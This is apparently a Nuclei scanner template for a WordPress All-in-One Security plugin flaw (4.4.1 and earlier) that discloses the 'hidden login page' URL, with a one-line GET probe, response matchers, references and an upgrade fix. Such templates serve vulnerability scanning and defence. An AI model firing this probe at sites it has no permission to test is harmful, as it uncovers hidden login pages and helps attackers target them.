漏洞描述
WordPress All-in-One Security plugin through 4.4.1 contains an exposure of the actual URL of the "hidden login page" feature.
id: wp-security-hidden-login-exposure
info:
name: WordPress All-in-One Security <=4.4.1 - Hidden Login Page Exposure
author: theamanrawat
severity: medium
description: |
WordPress All-in-One Security plugin through 4.4.1 contains an exposure of the actual URL of the "hidden login page" feature.
remediation: Upgrade to 4.4.2 or later.
reference:
- https://wpscan.com/vulnerability/467673ad-d0ad-46a3-80c7-8ebb3813a4b3/
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall
metadata:
verified: true
max-request: 1
tags: wp-plugin,exposure,wordpress,wp,wpscan,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?aiowpsec_do_log_out=1&al_additional_data=1"
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Username or Email Address"
- "wp_attempt_focus"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008e2120d6e59869f4c4066bd9de7cc87f8b875210651db5a585bd9f5f733f869302204b2931065f638066dab0b350b3957b49869b32b0a3e715c9c80d87168922a885:922c64590222798bb761d5b6d8e72950